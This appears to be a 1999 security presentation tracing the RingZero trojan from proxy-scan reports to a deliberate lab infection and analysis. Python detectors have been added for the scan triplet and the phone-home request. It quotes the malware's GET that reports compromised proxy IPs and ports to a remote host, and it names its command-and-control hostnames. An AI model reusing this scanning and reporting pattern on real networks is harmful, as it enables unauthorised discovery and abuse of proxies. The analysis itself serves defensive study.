The Hunt For RingZero
John Green [email protected].
Outline
• A word about Trojans
• Getting a clue
• Looking for data
• How many source hosts?
• The hunt for the Trojan
• Game over
• BoF Findings
Deep Throat - 2140
200.31.13.8 > 158.12.110.1.2140: udp 2
4500 001e e104 0000 7111 8795 ac14 0d08 c0a8 6e01 ea60 085c 000a fbb7 3030 8080 0001 0001 0000 0000 0664 6f6e 616c
200.31.13.8 > 158.12.110.2.2140: udp 2
4500 001e e204 0000 7111 8694 ac14 0d08 c0a8 6e02 ea60 085c 000a fbb6 3030 0000 0001 0000 0000 0000 0331 3831 0231
Trojans Review
• The most well-known Trojan programs are Netbus and Back Orifice
• Protective tools include: all major anti-virus tools, nuke nabber, NFR’s Back Officer Friendly and AtGuard
Getting A Clue
• Sept 19, 1999 Roland Grefer writes with an AtGuard detect from his home.com cable modem
• We both commented that probes to tcp port 3128 are not that common
More Clues
• Sept 21, 1999 - SHADOW analyst Adena Bushrod reports similar activity
• Contact other organizations: MITRE, ARL
• They see it too!
Proxy Scanning
08:58:35 ghostrid3r.1606 > 192.168.2.1.80: S(0)
08:58:36 ghostrid3r.1607 > 192.168.2.1.8080: S(0)
08:58:37 ghostrid3r.1609 > 192.168.2.1.3128: S(0)
How Big Is This Thing?!
Intrusion detection systems ranging from home computers with cable modems to high end government facilities have been reporting a large number of probes to TCP port 3128, the squid proxy service. If your site has a network monitoring capability and you DO NOT run squid and you detect this pattern over the next two weeks, please let us know by sending email to [email protected] with intrusion 3128 in the subject line. If you are allowed to send the data trace, please sanitize any of your site's network information (destination host address) and send the data trace as well. Thank you!
BIG!
Over 300 3128 Messages In Three Days
29;23Sep1999; 7:59:21;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;203.98.30.10;xxx.yyy.149.44;3128;64052;48;25;
30;23Sep1999; 7:59:24;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;203.98.30.10;xxx.yyy.149.44;3128;64053;48;25;
31;23Sep1999; 8:07:30;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;196.15.173.2;xxx.yyy.214.101;3128;64025;44;48;
32;23Sep1999; 8:24:05;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;209.203.121.119;xxx.yyy.124.154;3128;3820;48;25;
33;23Sep1999; 8:24:11;xxx.yyy.111.133;log;reject;;E100B1;inbound;tcp;194.51.132.171;xxx.yyy.170.248;3128;1195;44;25;
34;23Sep1999; 8:59:23;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;156.46.64.149;xxx.yyy.135.194;3128;2570;44;48;
35;23Sep1999; 9:00:49;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;194.51.132.171;xxx.yyy.214.228;3128;2932;44;48;
36;23Sep1999; 9:14:51;xxx.yyy.111.133;log;reject;;E100B1;inbound;tcp;195.44.9.20;xxx.yyy.95.90;3128;1089;44;25;
37;23Sep1999; 9:33:38;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;212.130.192.222;xxx.yyy.139.66;3128;2678;48;48;
38;23Sep1999; 9:40:13;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;193.125.239.105;xxx.yyy.1.31;3128;1531;48;48;
39;23Sep1999; 9:56:08;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;194.249.154.21;xxx.yyy.27.35;3128;2515;44;48;
40;23Sep1999; 9:57:40;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;200.14.243.166;xxx.yyy.123.25;3128;4879;48;25;
Over 1000 Source Hosts!
What Are The Possibilities? > 1000 Source Hosts
• Spoofed
• World’s largest coordinated attack
• Trojan software or “malware”
Source Host Analysis
“I am almost certain that these are indeed live, non-spoofed hosts. First, I've dumped the tcpdump traffic with the arriving TTL values. I've done about a dozen traceroutes back to the source IPs and the hop counts are believably close. Also, other clues found in the tcpdump output itself appear to point to different hosts or a very wise crafter.”
Judy Novak - ARL
The First Hot Tip - Sept 23
“We began receiving probes to 3128 on Wednesday, September 15th. The probes come in a triplet - first to TCP port 80, then 8080, then 3128. The probes appear to be going after random addresses. One finally hit a web server listening on port 80 so I got to see what it was doing. It sent the following request to the server:”
get http://www.rusftpsearch.net/cgi-bin/pst.pl/?pst mode = writeip&pst host=192.168.2.1&pstport=3128
Anonymous
Later verified by four other sources.
So What?
“Just a couple additional pieces of information. I only probed back in a rather simple way about 5 machines and found none of those running finger, SMTP or FTP, though all were running TCP port 139, so I concluded (with a very small sample size) it was a Windows attack of some kind, though I admit this is a guess based on sketchy information.”
Anonymous
Game Over?
“I am the Network Security Officer at Vanderbilt University. I have a system that was infected with a trojan called RingZero and was scanning for ports 80, 8080, and 3128. I have pieces of the code, specifically a file called its.exe and a file that was Ring0.vxd. I am still trying to find the original infected file and I suspect that it was a screen saver. If you would like more info give me a call.”
Ron Marcum, Vanderbilt
Basic Game Plan
• Move the Vanderbilt files to a “safe” platform for examination
• Use strings and other unix utilities to examine the files
• Targeting mechanism was a primary interest
Hour 1 - Gameplan Deviation
• Strings, etc. didn’t get us very far
• RingZero uses Ian Luck’s “Petite” program to compress the executables
• Tim White volunteers to sacrifice his Windows laptop
Hour 2 - Deliberate Infection
• Created a mini-network
• 2 computers, both running sniffers
• Unzipped the archive
• Two files: its.exe, pst.exe
– it was a “coin-toss”
Hour 3 - Examining ITS.EXE
• Ran its.exe
– removed itself from the desktop
– its.exe and Ring0.vxd placed in \windows\system directory
– created an empty its.dat file
• No network activity….. :(
Traffic At Last!
• After rebooting, the infected machine started doing DNS queries for hosts named:
– phzforum.virtualave.net
– xoom.members.com
Now we’re getting somewhere!
So What Now?
• Created an entry in the infected machine’s hosts file
– Gave it the IP address of the sniffer
• Infected machine started sending web requests on port 80
Hours 4 and 5 - Reconfiguring the Sniffer Machine
• Switched to Linux
• Ran Apache and tcpdump
• Apache logs showed that its.exe was trying to retrieve an its.dat file from the webservers
– phzforum.virtualave.net/its.dat
– xoom.members.com/harmer/its.dat
What Should Be In ITS.DAT?
• its.dat no longer existed on phzforum.virtualave.net
• Terminal room closed before we discovered the xoom.members.com connection
• its.dat was found the following morning, but it is encrypted?
Party Over? - Nope!
• Getting very late
• Oak Room closed
• Remaining BoF members relocated to a corner, downstairs in LaSalle’s
Hours 6 and 7 - Running The PST.EXE File
• Ran PST.EXE
• Initial behavior was the same as the its.exe
– relocated itself, etc.
PST.EXE spewed packets to ports 80, 8080, and 3128!
PST.EXE Behavior
• Generated a small list of “random?” IP addresses
• Scanned all IPs for port 80, then 8080, and finally 3128
• Repeated
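The 80, 8080, 3128 sequence seen on the Proxy Scanning slide and reproduced by PST.EXE above is mechanical enough to pick out of sniffer output. The following Python is an added example, not code from the deck: it parses tcpdump-style SYN lines in the form shown on that slide (an assumed, constructed format) and flags every source that completed the ordered triplet against one target within a short window; the sample lines are constructed.

```python
import re
from collections import defaultdict

# One SYN per line, in the tcpdump style of the Proxy Scanning slide, e.g.
#   08:58:35 ghostrid3r.1606 > 192.168.2.1.80: S(0)
SYN_RE = re.compile(r"^(\d\d:\d\d:\d\d)\s+(\S+)\.(\d+)\s+>\s+(\S+)\.(\d+):\s+S\b")
TRIPLET = (80, 8080, 3128)  # the RingZero probe order: 80, then 8080, then squid

def _seconds(hhmmss):
    h, m, s = (int(x) for x in hhmmss.split(":"))
    return h * 3600 + m * 60 + s

def find_ringzero_scans(lines, window=10):
    """{(src, dst): time of first SYN} for sources hitting 80, 8080, 3128 in order within `window` s."""
    probes = defaultdict(list)  # (src, dst) -> [(secs, dport, time_str)]
    for line in lines:
        m = SYN_RE.match(line)
        if not m:
            continue  # not a SYN line in the expected format
        ts, src, _sport, dst, dport = m.groups()
        probes[(src, dst)].append((_seconds(ts), int(dport), ts))
    hits = {}
    for key, plist in probes.items():
        plist.sort()
        for i, (t0, port, ts) in enumerate(plist):
            if port != TRIPLET[0]:
                continue  # a sweep starts with port 80
            want = 1  # index of the next port we expect to see
            for t, p, _ in plist[i + 1:]:
                if t - t0 > window:
                    break  # too slow to be the same sweep
                if p == TRIPLET[want]:
                    want += 1
                    if want == len(TRIPLET):
                        hits.setdefault(key, ts)  # keep the earliest completed sweep
                        break
    return hits

# Constructed sample sniffer output (not from the deck): two RingZero-style
# sweeps and one host that merely retries port 80.
SAMPLE = """\
08:58:35 ghostrid3r.1606 > 192.168.2.1.80: S(0)
08:58:36 ghostrid3r.1607 > 192.168.2.1.8080: S(0)
08:58:37 ghostrid3r.1609 > 192.168.2.1.3128: S(0)
08:58:40 10.0.0.7.2031 > 192.168.2.1.80: S(0)
09:10:02 203.0.113.9.3421 > 192.168.2.5.80: S(0)
09:10:03 203.0.113.9.3422 > 192.168.2.5.8080: S(0)
09:10:04 203.0.113.9.3423 > 192.168.2.5.3128: S(0)
""".splitlines()
```

Counting the distinct sources in the returned dictionary over a site's own sniffer logs is how a figure like the deck's "over 1000 source hosts" is reached.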
What Is It Doing Though?
• Since the scan was sequential, we were able to configure apache “on-the-fly” to answer web requests for IPs in the scan.
• Examining the Apache logs showed what we had hoped for:
The End Game
get http://www.rusftpsearch.net/cgi-bin/pst.pl/?pst mode = writeip&pst host=192.168.2.1&pstport=3128
The proxy is being used to send its own IP address and proxy port home to the “mothership”!
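A site that receives one of these probes on a web server, or that proxies an infected host's traffic, can look for the request above in its access logs. The following Python is an added example, not part of the original presentation: it scans Apache common-log lines (an assumed format) for GETs to pst.pl whose query carries the writeip mode and reports the client together with the host and port it announced. Parameter names follow the transcript (pst mode, pst host, pstport); the parser ignores spaces, underscores and hyphens in keys so either spelling matches, and the sample lines are constructed.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Apache common-log line (assumed format), e.g.
#   192.168.2.1 - - [23/Sep/1999:21:14:03 -0400] "GET /cgi-bin/pst.pl/?... HTTP/1.0" 200 -
CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def query_pairs(url):
    """Query string of `url` as {key: value}; keys are lower-cased with spaces,
    underscores and hyphens removed, so 'pst host' and 'pst_host' both become 'psthost'."""
    pairs = {}
    for field in urlsplit(url).query.split("&"):
        if not field:
            continue
        k, _, v = field.partition("=")
        pairs[re.sub(r"[\s_-]+", "", unquote_plus(k)).lower()] = unquote_plus(v).strip()
    return pairs

def find_ringzero_reports(lines):
    """[(client, time, announced_host, announced_port)] for every GET to pst.pl
    whose query says pst mode=writeip, i.e. a proxy reporting itself home."""
    reports = []
    for line in lines:
        m = CLF_RE.match(line)
        if not m:
            continue  # not a request line we understand
        client, when, method, url, _status = m.groups()
        # urlsplit copes with both a plain path and the absolute URL a proxy logs
        if method.upper() != "GET" or not urlsplit(url).path.rstrip("/").endswith("/pst.pl"):
            continue
        q = query_pairs(url)
        if q.get("pstmode") != "writeip":
            continue
        reports.append((client, when, q.get("psthost"), q.get("pstport")))
    return reports

# Constructed access-log sample (not from the deck): a phone-home hitting a web
# server, the same request seen through a proxy, and an ordinary page fetch.
SAMPLE = """\
192.168.2.1 - - [23/Sep/1999:21:14:03 -0400] "GET /cgi-bin/pst.pl/?pst%20mode=writeip&pst%20host=192.168.2.1&pstport=3128 HTTP/1.0" 200 -
10.0.0.9 - - [23/Sep/1999:21:14:05 -0400] "GET http://www.rusftpsearch.net/cgi-bin/pst.pl/?pst_mode=writeip&pst_host=10.0.0.9&pstport=8080 HTTP/1.0" 200 -
10.0.0.5 - - [23/Sep/1999:21:15:10 -0400] "GET /index.html HTTP/1.0" 200 1422
""".splitlines()
```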
Review of Findings
• ITS.EXE attempts to retrieve files from various webservers
• PST.EXE is the active scanner
– doesn’t require the its.dat file to run
– discovered proxies send their IPs to www.rusftpsearch.net
Questions Still Remain
• Infection mechanism?
• How does it start at boot time?
• What is the its.dat file for?
– Targeting
– Scan intensity dial
– Attack configuration
Implications?
Quantum leap in distributed attack technology
• Viral infection rates
• Configurable - its.dat
– scanning -> attacking?
• Automatic result consolidation